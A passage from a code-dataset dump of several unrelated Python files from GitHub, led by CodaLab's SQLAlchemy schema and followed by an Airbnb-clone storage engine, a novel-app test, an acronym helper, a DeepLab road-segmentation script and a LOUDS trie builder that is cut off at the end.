Currently, only worksheet.title uses the Unicode column type.\nfrom sqlalchemy import Column, ForeignKey, Index, MetaData, Table, UniqueConstraint\nfrom sqlalchemy.types import (\n BigInteger,\n Boolean,\n DateTime,\n Enum,\n Float,\n Integer,\n LargeBinary,\n String,\n Text,\n Unicode,\n)\nfrom sqlalchemy.sql.schema import ForeignKeyConstraint\nfrom codalab.common import StorageType\n\ndb_metadata = MetaData()\n\n# Set tables' charset to utf8, so that it is not set to latin1 by default upon creation.\n# TODO: Migrate to utf8mb4 (https://github.com/codalab/codalab-worksheets/issues/3849)\nTABLE_DEFAULT_CHARSET = 'utf8'\n\nbundle = Table(\n 'bundle',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('uuid', String(63), nullable=False),\n Column('bundle_type', String(63), nullable=False),\n # The command will be NULL except for run bundles.\n Column('command', Text, nullable=True),\n Column('state', String(63), nullable=False),\n Column('owner_id', String(255), nullable=True),\n Column('frozen', DateTime, nullable=True), # When the bundle was frozen, if it is.\n Column('is_anonymous', Boolean, nullable=False, default=False),\n Column(\n 'storage_type',\n Enum(StorageType.DISK_STORAGE.value, StorageType.AZURE_BLOB_STORAGE.value),\n nullable=True,\n ), # Where the bundle contents are stored. If set to null, nothing has been uploaded for the bundle yet.\n # When updating this column, sync it with codalab.common.StorageType.\n Column(\n 'is_dir', Boolean, nullable=True,\n ), # Whether the bundle is a directory or just a single file. If set to null, nothing has been uploaded for the bundle yet.\n UniqueConstraint('uuid', name='uix_1'),\n Index('state_index', 'state'), # Needed for the bundle manager.\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Includes things like name, description, etc.\nbundle_metadata = Table(\n 'bundle_metadata',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('bundle_uuid', String(63), ForeignKey(bundle.c.uuid), nullable=False),\n Column('metadata_key', String(63), nullable=False),\n Column('metadata_value', Text, nullable=False),\n Index('metadata_kv_index', 'metadata_key', 'metadata_value', mysql_length=63),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# For each child_uuid, we have: key = child_path, target = (parent_uuid, parent_path)\nbundle_dependency = Table(\n 'bundle_dependency',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('child_uuid', String(63), ForeignKey(bundle.c.uuid), nullable=False),\n Column('child_path', Text, nullable=False),\n # Deliberately omit ForeignKey(bundle.c.uuid), because bundles can have\n # dependencies to bundles not (yet) in the system.\n Column('parent_uuid', String(63), nullable=False),\n Column('parent_path', Text, nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Storage location for bundles.\nbundle_store = Table(\n 'bundle_store',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('uuid', String(63), nullable=False),\n # Usually root. 
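This module builds every table with SQLAlchemy Core against one shared MetaData registry. A minimal, self-contained version of the pattern -- a two-column stand-in for the bundle table, created on an in-memory SQLite engine rather than the real database:

from sqlalchemy import Column, Integer, MetaData, String, Table, create_engine

metadata = MetaData()
bundle_demo = Table(
    'bundle_demo', metadata,
    Column('id', Integer, primary_key=True, autoincrement=True),
    Column('uuid', String(63), nullable=False),
)
engine = create_engine('sqlite://')  # in-memory database
metadata.create_all(engine)          # emits CREATE TABLE for all registered tables
with engine.connect() as conn:
    conn.execute(bundle_demo.insert().values(uuid='0x1234'))
    print(conn.execute(bundle_demo.select()).fetchall())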
For BYO bundle stores (not yet supported),\n # it is the user who created the bundle store.\n Column('owner_id', String(255), nullable=True),\n # Name used to refer to this bundle store from the CLI.\n Column('name', String(255), nullable=False),\n # Storage type. This is usually redundant with information already in the url column, but set for efficiency reasons. When updating this column, sync it with codalab.common.StorageType.\n Column('storage_type', String(255), nullable=True),\n # The format through which the bundle is stored.\n Column('storage_format', String(255), nullable=True),\n # URL that uniquely identifies the bundle store.\n Column('url', String(255), nullable=True),\n # Authentication / password to access the bundle store.\n Column('authentication', String(255), nullable=True),\n # Name of environment variable through which the authentication variable from above can be passed to codalab-service to access the bundle store.\n Column('authentication_env', String(255), nullable=True),\n UniqueConstraint('uuid', name='uix_1'),\n UniqueConstraint('name', name='nix_1'),\n Index('bundle_store_name_index', 'name'),\n Index('bundle_store_owner_index', 'owner_id'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n\n# Location where the contents of a bundle is stored. Multiple\n# BundleLocations can be associated with a single Bundle.\nbundle_location = Table(\n 'bundle_location',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n # Which bundle this location contains the contents of.\n Column('bundle_uuid', String(63), ForeignKey(bundle.c.uuid), nullable=False),\n # Which bundle store this location is on.\n Column('bundle_store_uuid', String(63), ForeignKey(bundle_store.c.uuid), nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n\n# The worksheet table does not have many columns now, but it will eventually\n# include columns for owner, group, permissions, etc.\nworksheet = Table(\n 'worksheet',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('uuid', String(63), nullable=False),\n Column('name', String(255), nullable=False),\n Column('owner_id', String(255), nullable=True),\n Column(\n 'title', Unicode(255), nullable=True\n ), # Short human-readable description of the worksheet\n Column('frozen', DateTime, nullable=True), # When the worksheet was frozen, if it is.\n Column('is_anonymous', Boolean, nullable=False, default=False),\n Column(\n 'date_created', DateTime\n ), # When the worksheet was created; Set to null if the worksheet created before v0.5.31; Set to current timestamp by default\n Column(\n 'date_last_modified', DateTime\n ), # When the worksheet was last modified; Set to null if the worksheet created before v0.5.31; Set to current_timestamp by default\n UniqueConstraint('uuid', name='uix_1'),\n Index('worksheet_name_index', 'name'),\n Index('worksheet_owner_index', 'owner_id'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\nworksheet_item = Table(\n 'worksheet_item',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('worksheet_uuid', String(63), ForeignKey(worksheet.c.uuid), nullable=False),\n # A worksheet item is either:\n # - type = bundle (bundle_uuid != null)\n # - type = worksheet (subworksheet_uuid != null)\n # - type = markup (value != null)\n # - 
type = directive (value != null)\n # Deliberately omit ForeignKey(bundle.c.uuid), because worksheets can contain\n # bundles and worksheets not (yet) in the system.\n Column('bundle_uuid', String(63), nullable=True),\n Column('subworksheet_uuid', String(63), nullable=True),\n Column('value', Text, nullable=False), # TODO: make this nullable\n Column('type', String(20), nullable=False),\n Column('sort_key', Integer, nullable=True),\n Index('worksheet_item_worksheet_uuid_index', 'worksheet_uuid'),\n Index('worksheet_item_bundle_uuid_index', 'bundle_uuid'),\n Index('worksheet_item_subworksheet_uuid_index', 'subworksheet_uuid'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Worksheet tags\nworksheet_tag = Table(\n 'worksheet_tag',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('worksheet_uuid', String(63), ForeignKey(worksheet.c.uuid), nullable=False),\n Column('tag', String(63), nullable=False),\n Index('worksheet_tag_worksheet_uuid_index', 'worksheet_uuid'),\n Index('worksheet_tag_tag_index', 'tag'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\ngroup = Table(\n 'group',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('uuid', String(63), nullable=False),\n Column('name', String(255), nullable=False),\n Column('user_defined', Boolean),\n Column('owner_id', String(255), nullable=True),\n UniqueConstraint('uuid', name='uix_1'),\n Index('group_name_index', 'name'),\n Index('group_owner_id_index', 'owner_id'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\nuser_group = Table(\n 'user_group',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('group_uuid', String(63), ForeignKey(group.c.uuid), nullable=False),\n Column('user_id', String(63), ForeignKey(\"user.user_id\"), nullable=False),\n # Whether a user is able to modify this group.\n Column('is_admin', Boolean),\n Index('group_uuid_index', 'group_uuid'),\n Index('user_id_index', 'user_id'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Permissions for bundles\ngroup_bundle_permission = Table(\n 'group_bundle_permission',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('group_uuid', String(63), ForeignKey(group.c.uuid), nullable=False),\n # Reference to a bundle\n Column('object_uuid', String(63), ForeignKey(bundle.c.uuid), nullable=False),\n # Permissions encoded as integer (see below)\n Column('permission', Integer, nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Permissions for worksheets\ngroup_object_permission = Table(\n 'group_object_permission',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('group_uuid', String(63), ForeignKey(group.c.uuid), nullable=False),\n # Reference to a worksheet object\n Column('object_uuid', String(63), ForeignKey(worksheet.c.uuid), nullable=False),\n # Permissions encoded as integer (see below)\n Column('permission', Integer, nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# A permission value is one of the following: none (0), read (1), or all (2).\nGROUP_OBJECT_PERMISSION_NONE = 0x00\nGROUP_OBJECT_PERMISSION_READ = 
0x01\nGROUP_OBJECT_PERMISSION_ALL = 0x02\n\n# A notifications value is one of the following:\nNOTIFICATIONS_NONE = 0x00 # Receive no notifications\nNOTIFICATIONS_IMPORTANT = 0x01 # Receive only important notifications\nNOTIFICATIONS_GENERAL = 0x02 # Receive general notifications (new features)\n\n# Store information about users.\nuser = Table(\n 'user',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n # Basic information\n Column('user_id', String(63), nullable=False),\n Column('user_name', String(63), nullable=False, unique=True),\n Column(\n 'email', String(254), nullable=False, unique=True\n ), # Length of 254 to be compliant with RFC3696/5321\n Column(\n 'notifications', Integer, nullable=False, default=NOTIFICATIONS_GENERAL\n ), # Which emails user wants to receive\n Column('last_login', DateTime), # Null if user has never logged in\n Column(\n 'is_active', Boolean, nullable=False, default=True\n ), # Set to False instead of deleting users to maintain foreign key integrity\n Column('first_name', String(30, convert_unicode=True)),\n Column('last_name', String(30, convert_unicode=True)),\n Column('date_joined', DateTime, nullable=False),\n Column('has_access', Boolean, default=False, nullable=True),\n Column('is_verified', Boolean, nullable=False, default=False),\n Column('password', String(128), nullable=False),\n # Additional information\n Column('affiliation', String(255, convert_unicode=True), nullable=True),\n Column('url', String(255, convert_unicode=True), nullable=True),\n # Quotas\n Column('time_quota', Float, nullable=False), # Number of seconds allowed\n Column('parallel_run_quota', Integer, nullable=False), # Number of parallel jobs allowed\n Column('time_used', Float, nullable=False), # Number of seconds already used\n Column('disk_quota', Float, nullable=False), # Number of bytes allowed\n Column('disk_used', Float, nullable=False), # Number of bytes already used\n Column(\n 'avatar_id', String(63), nullable=True\n ), # bundle id of the user's uploaded profile picture; Null if the user has never uploaded one\n Index('user_user_id_index', 'user_id'),\n Index('user_user_name_index', 'user_name'),\n UniqueConstraint('user_id', name='uix_1'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Stores (email) verification keys\nuser_verification = Table(\n 'user_verification',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=False),\n Column('date_created', DateTime, nullable=False),\n Column('date_sent', DateTime, nullable=True),\n Column('key', String(64), nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Stores password reset codes\nuser_reset_code = Table(\n 'user_reset_code',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=False),\n Column('date_created', DateTime, nullable=False),\n Column('code', String(64), nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# OAuth2 Tables\n\noauth2_client = Table(\n 'oauth2_client',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('client_id', String(63), nullable=False),\n 
Column('name', String(63), nullable=True),\n Column('secret', String(255), nullable=True),\n Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=True),\n Column(\n 'grant_type',\n Enum(\"authorization_code\", \"password\", \"client_credentials\", \"refresh_token\"),\n nullable=False,\n ),\n Column('response_type', Enum(\"code\", \"token\"), nullable=False),\n Column('scopes', Text, nullable=False), # comma-separated list of allowed scopes\n Column('redirect_uris', Text, nullable=False), # comma-separated list of allowed redirect URIs\n UniqueConstraint('client_id', name='uix_1'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\noauth2_token = Table(\n 'oauth2_token',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('client_id', String(63), ForeignKey(oauth2_client.c.client_id), nullable=False),\n Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=False),\n Column('scopes', Text, nullable=False),\n Column('access_token', String(255), unique=True),\n Column('refresh_token', String(255), unique=True),\n Column('expires', DateTime, nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\noauth2_auth_code = Table(\n 'oauth2_auth_code',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('client_id', String(63), ForeignKey(oauth2_client.c.client_id), nullable=False),\n Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=False),\n Column('scopes', Text, nullable=False),\n Column('code', String(100), nullable=False),\n Column('expires', DateTime, nullable=False),\n Column('redirect_uri', String(255), nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Store information about users' questions or feedback.\nchat = Table(\n 'chat',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ), # Primary key\n Column('time', DateTime, nullable=False), # When did the user send this query?\n Column('sender_user_id', String(63), nullable=True), # Who sent it?\n Column('recipient_user_id', String(63), nullable=True), # Who received it?\n Column('message', Text, nullable=False), # What's the content of the chat?\n Column(\n 'worksheet_uuid', String(63), nullable=True\n ), # What is the id of the worksheet that the sender is on?\n Column(\n 'bundle_uuid', String(63), nullable=True\n ), # What is the id of the bundle that the sender is on?\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Store information about workers.\nworker = Table(\n 'worker',\n db_metadata,\n Column('user_id', String(63), ForeignKey(user.c.user_id), primary_key=True, nullable=False),\n Column('worker_id', String(127), primary_key=True, nullable=False),\n Column('group_uuid', String(63), ForeignKey(group.c.uuid), nullable=True),\n Column('tag', Text, nullable=True), # Tag that allows for scheduling runs on specific workers.\n Column('cpus', Integer, nullable=False), # Number of CPUs on worker.\n Column('gpus', Integer, nullable=False), # Number of GPUs on worker.\n Column('memory_bytes', BigInteger, nullable=False), # Total memory of worker.\n Column('free_disk_bytes', BigInteger, nullable=True), # Available disk space on worker.\n Column(\n 'checkin_time', DateTime, nullable=False\n ), # When the worker last checked in with the bundle service.\n Column('socket_id', Integer, 
nullable=False), # Socket ID worker listens for messages on.\n    Column(\n        'shared_file_system', Boolean, nullable=False\n    ),  # Whether the worker and the server have a shared filesystem.\n    Column(\n        'tag_exclusive', Boolean, nullable=False\n    ),  # Whether worker runs bundles if and only if they match tags.\n    Column(\n        'exit_after_num_runs', Integer, nullable=False\n    ),  # Number of jobs allowed to run on worker.\n    Column('is_terminating', Boolean, nullable=False),\n    Column('preemptible', Boolean, nullable=False),  # Whether worker is preemptible.\n    mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Store information about all sockets currently allocated to each worker.\nworker_socket = Table(\n    'worker_socket',\n    db_metadata,\n    Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=False),\n    Column('worker_id', String(127), nullable=False),\n    # No foreign key constraint on the worker table so that we can create a socket\n    # for the worker before adding the worker to the worker table.\n    Column('socket_id', Integer, primary_key=True, nullable=False),\n    mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Store information about the bundles currently running on each worker.\nworker_run = Table(\n    'worker_run',\n    db_metadata,\n    Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=False),\n    Column('worker_id', String(127), nullable=False),\n    ForeignKeyConstraint(['user_id', 'worker_id'], ['worker.user_id', 'worker.worker_id']),\n    Column('run_uuid', String(63), ForeignKey(bundle.c.uuid), nullable=False),\n    Index('uuid_index', 'run_uuid'),\n    mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Store information about the dependencies available on each worker.\nworker_dependency = Table(\n    'worker_dependency',\n    db_metadata,\n    Column('user_id', String(63), ForeignKey(user.c.user_id), primary_key=True, nullable=False),\n    Column('worker_id', String(127), primary_key=True, nullable=False),\n    ForeignKeyConstraint(['user_id', 'worker_id'], ['worker.user_id', 'worker.worker_id']),\n    # Serialized list of dependencies for the user/worker combination.\n    # See WorkerModel for the serialization method.\n    Column('dependencies', LargeBinary, nullable=False),\n    mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n","repo_name":"codalab/codalab-worksheets","sub_path":"codalab/model/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":21321,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"77"} +{"seq_id":"28040718056","text":"#!/usr/bin/python3\n\"\"\"\nDefines the DBStorage Engine for the project\n\"\"\"\nfrom os import getenv\nfrom models.base_model import Base\nfrom models.base_model import BaseModel\nfrom models.amenity import Amenity\nfrom models.city import City\nfrom models.place import Place\nfrom models.review import Review\nfrom models.state import State\nfrom models.user import User\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm import sessionmaker\n\n\nclass DBStorage:\n    \"\"\"\n    This class represents the DBStorage engine\n    \"\"\"\n    __engine = None\n    __session = None\n\n    def __init__(self):\n        \"\"\"\n        Initializes the DBStorage instances\n        \"\"\"\n        db_uri = \"{0}+{1}://{2}:{3}@{4}:3306/{5}\".format(\n            'mysql', 'mysqldb', getenv('HBNB_MYSQL_USER'),\n            getenv('HBNB_MYSQL_PWD'), getenv('HBNB_MYSQL_HOST'),\n            getenv('HBNB_MYSQL_DB'))\n\n        self.__engine = create_engine(db_uri, pool_pre_ping=True)\n        self.reload()\n\n        if getenv('HBNB_ENV') == 'test':\n            
Base.metadata.drop_all(self.__engine)\n\n    def all(self, cls=None):\n        \"\"\"\n        Query on current db session\n        Args:\n            cls:\n\n        Returns: Dictionary of objects\n\n        \"\"\"\n        entities = dict()\n\n        if cls:\n            return self.get_data_from_table(cls, entities)\n\n        all_classes = ['Amenity', 'City', 'Place', 'Review', 'State', 'User']\n        for entity in all_classes:\n            entities = self.get_data_from_table(eval(entity), entities)\n\n        return entities\n\n    def new(self, obj):\n        \"\"\"\n        Adds the object to the current db session\n        Args:\n            obj:\n\n        Returns:\n\n        \"\"\"\n        self.__session.add(obj)\n\n    def save(self):\n        \"\"\"\n        Commit all changes to the current db session\n        Returns:\n\n        \"\"\"\n        self.__session.commit()\n\n    def delete(self, obj=None):\n        \"\"\"\n        Delete from the current db session\n        Args:\n            obj:\n\n        Returns:\n\n        \"\"\"\n        if obj is not None:\n            self.__session.delete(obj)\n\n    def reload(self):\n        \"\"\"\n        Create all tables in the db\n        Returns:\n\n        \"\"\"\n        Base.metadata.create_all(self.__engine)\n        session_factory = sessionmaker(bind=self.__engine,\n                                       expire_on_commit=False)\n        Session = scoped_session(session_factory)\n        self.__session = Session()\n\n    def get_data_from_table(self, cls, structure):\n        \"\"\"Get the data from a MySQL Table\n        \"\"\"\n\n        if type(structure) is dict:\n            query = self.__session.query(cls)\n\n            for _row in query.all():\n                key = \"{}.{}\".format(cls.__name__, _row.id)\n                structure[key] = _row\n\n        return structure\n\n    def close(self):\n        \"\"\"\n        Closes all working SQLAlchemy sessions\n        Returns:\n\n        \"\"\"\n        self.__session.close()\n","repo_name":"ThaKookieMansta/AirBnB_clone_v2","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"71601039288","text":"from backend.service.NovelReadService import novel_read_service\nfrom backend.service.NovelDisplayService import novel_display_service\nfrom backend.controller.ReadPageController import read_page_controller\nfrom backend.controller.DisplayPageController import display_page_controller\nfrom backend.controller.InitController import init_controller\n\n\nclass DataBaseTest:\n\n    def delete_all(self):\n        novel_read_service.delete_chapter_basic_infos_from_db()\n        novel_display_service.delete_novel_display_infos_from_db()\n        novel_display_service.delete_novel_covers_from_resource()\n\n    # 5 novels take about 18 seconds\n    def create_by_novel_basic_infos(self):\n        l = display_page_controller.get_novel_basic_infos()\n        display_page_controller.get_novel_display_infos()\n\n        for o in l.values():\n            read_page_controller.get_chapter_basic_infos_by_basic_object(o)\n\n    def delete_all_and_create_by_novel_basic_infos(self):\n        novel_read_service.delete_chapter_basic_infos_from_db()\n        novel_display_service.delete_novel_display_infos_from_db()\n        novel_display_service.delete_novel_covers_from_resource()\n\n        l = display_page_controller.get_novel_basic_infos()\n        display_page_controller.get_novel_display_infos()\n\n        for o in l.values():\n            read_page_controller.get_novel_all_chapters_basic_info_by_object(o)\n            read_page_controller.get_chapter_basic_infos_by_basic_object(o)\n\n    # 5 novels take about 9 seconds\n    def test_init(self):\n        init_controller.init_all_novels_needy_data()\n\n\nif __name__ == \"__main__\":\n    t = DataBaseTest()\n    t.delete_all()\n","repo_name":"Charipoter/moyu-novels","sub_path":"backend/test/DataBaseTest.py","file_name":"DataBaseTest.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"35031500747","text":"def 
create_acronym(phrase):\n    words = phrase.split()  # Split the phrase into a list of words\n    acronym = \"\"\n\n    for word in words:\n        acronym += word[0].upper()  # Add the first character of each word to the acronym\n\n    return acronym\n\n# Example usage\nphrase = \"James Bullough Lansing\"\nacronym = create_acronym(phrase)\nprint(acronym)  # Output: JBL\n","repo_name":"nkusikevin/Py_sandbox","sub_path":"Create Acronyms/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38825753743","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[38]:\n\n\nimport os\nfrom io import BytesIO\nimport tarfile\nimport tempfile\nfrom six.moves import urllib\n\nfrom matplotlib import gridspec\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom PIL import Image\n\nimport tensorflow as tf\n\n\nclass DeepLabModel(object):\n  \"\"\"Class to load deeplab model and run inference.\"\"\"\n\n  INPUT_TENSOR_NAME = 'ImageTensor:0'\n  OUTPUT_TENSOR_NAME = 'SemanticPredictions:0'\n  INPUT_SIZE = 700\n  FROZEN_GRAPH_NAME = 'frozen_inference_graph'\n\n  def __init__(self, tarball_path):\n    \"\"\"Creates and loads pretrained deeplab model.\"\"\"\n    self.graph = tf.Graph()\n\n    graph_def = None\n    # Extract frozen graph from tar archive.\n    tar_file = tarfile.open(tarball_path)\n    for tar_info in tar_file.getmembers():\n      if self.FROZEN_GRAPH_NAME in os.path.basename(tar_info.name):\n        file_handle = tar_file.extractfile(tar_info)\n        graph_def = tf.GraphDef.FromString(file_handle.read())\n        break\n\n    tar_file.close()\n\n    if graph_def is None:\n      raise RuntimeError('Cannot find inference graph in tar archive.')\n\n    with self.graph.as_default():\n      tf.import_graph_def(graph_def, name='')\n\n    self.sess = tf.Session(graph=self.graph)\n\n  def run(self, image):\n    \"\"\"Runs inference on a single image.\n\n    Args:\n      image: A PIL.Image object, raw input image.\n\n    Returns:\n      resized_image: RGB image resized from original input image.\n      seg_map: Segmentation map of `resized_image`.\n    \"\"\"\n    width, height = image.size\n    resize_ratio = 1.0 * self.INPUT_SIZE / max(width, height)\n    target_size = (int(resize_ratio * width), int(resize_ratio * height))\n    resized_image = image.convert('RGB').resize(target_size, Image.ANTIALIAS)\n    batch_seg_map = self.sess.run(\n        self.OUTPUT_TENSOR_NAME,\n        feed_dict={self.INPUT_TENSOR_NAME: [np.asarray(resized_image)]})\n    seg_map = batch_seg_map[0]\n    return resized_image, seg_map\n\n\n# In[39]:\n\n\ndownload_path = '/home/stmoon/Test/models/deeplabv3_cityscapes_train_2018_02_06.tar.gz'\nMODEL = DeepLabModel(download_path)\n\n\n# In[31]:\n\n\nimport glob\n\ndir_path = '/home/stmoon/Project/AE590/data/out4_20181102_170021/'\nout_path = '/home/stmoon/Project/AE590/deeplab/out/out5'\n\n\ndef extract_road(input_path, output_path) :\n    file_list = sorted(glob.glob(input_path + '/*.png'))\n\n    for f in file_list :\n        img = Image.open(f) \n\n        resized_im, seg_map = MODEL.run(img)\n        p = resized_im.load()\n\n        for i in range(resized_im.size[0]) :\n            for j in range(resized_im.size[1]) :\n                if seg_map[j,i] == 0 :\n                    p[i,j] = tuple([int(x*0.3) for x in p[i,j]])\n        \n        resized_im.save(output_path + '/' + f.split('/')[-1])\n    \n\n\n# In[69]:\n\n\nimport glob\nimport os.path\n\ndef extract_road(input_path, output_path) :\n    file_list = sorted(glob.glob(input_path + '/*.png'))\n\n    for f in file_list :\n        file_path = output_path + '/' + f.split('/')[-1]\n        file_path = file_path.replace('.png', '.txt')\n\n        if 
not os.path.exists(file_path):\n\n            print(f)\n            \n            img = Image.open(f) \n            resized_im, seg_map = MODEL.run(img)\n            \n            np.savetxt(file_path, seg_map, fmt=\"%d\", delimiter=\",\")\n        \n    \n\n\n# In[70]:\n\n\nimport os\n\n#20181102_163625.mp4  20181102_164146.mp4  20181102_164558.mp4  20181102_164952.mp4  20181102_165724.mp4\n#20181102_163933.mp4  20181102_164357.mp4  20181102_164756.mp4  20181102_165208.mp4  20181102_170021.mp4\n\nvideo_name = [\n    '20181102_163625', \n    '20181102_164146',\n    '20181102_164558',\n    '20181102_164952',\n    '20181102_165724',\n    '20181102_163933',\n    '20181102_164357',\n    '20181102_164756',\n    '20181102_165208',\n    '20181102_170021']\n\nfor v in video_name :\n    file_path = \"/home/stmoon/Project/AE590/data/out_\" + v\n    out_path = \"/home/stmoon/Project/AE590/deeplab/out/out_\" + v\n    print(file_path, out_path)\n    os.makedirs(out_path, exist_ok=True)\n    extract_road(file_path, out_path)\n\n\n# In[ ]:\n\n\n","repo_name":"stmoon/AE590","sub_path":"deeplab/extract_road.py","file_name":"extract_road.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72980414644","text":"class Node(object):\n    \"\"\"\n    The node of the tree.\n    Each node has one character as its member.\n    \"\"\"\n    def __init__(self, value):\n        self.value = value\n        self.children = []\n        self.visited = False\n\n    def __str__(self):\n        return str(self.value)\n\n    def add_child(self, child):\n        self.children.append(child)\n\n\nclass ArrayConstructor(object):\n    \"\"\"\n    This class has:\n    a function which constructs a tree by words\n    a function which dumps the tree as a LOUDS bit-string\n    \"\"\"\n    def __init__(self):\n        self.tree = Node('')  #The root node\n\n    def add(self, word):\n        \"\"\"\n        Add a word to the tree\n        \"\"\"\n        self.build(self.tree, word)\n\n    def build(self, node, word, depth=0):\n        \"\"\"\n        Build a tree\n        \"\"\"\n        if(depth == len(word)):\n            return\n\n        for child in node.children:\n            # if a child whose value is word[depth] exists,\n            # continue building the tree from that child.\n            if(child.value == word[depth]):\n                self.build(child, word, depth+1)\n                return\n\n        # if no child whose value is word[depth] exists,\n        # make a node and continue constructing the tree.\n        child = Node(word[depth])\n        node.add_child(child)\n        self.build(child, word, depth+1)\n        return\n\n    def show(self):\n        self.show_(self.tree)\n\n    def show_(self, node, depth=0):\n        print(\"{}{}\".format(' '*depth, node))\n        for child in node.children:\n            self.show_(child, depth+1)\n\n    def dump(self):\n        \"\"\"\n        Dump a LOUDS bit-string\n        \"\"\"\n        from collections import deque\n\n        bit_array = [1, 0]  # [1, 0] indicates the 0th node\n        labels = ['']\n\n        #dumps by Breadth-first search\n        queue = deque()\n        queue.append(self.tree)\n\n        while(len(queue) != 0):\n            node = queue.popleft()\n            labels.append(node.value)\n\n            bit_array += [1] * len(node.children) + [0]\n\n            for child in node.children:\n                child.visited = True\n                queue.append(child)\n        return bit_array, 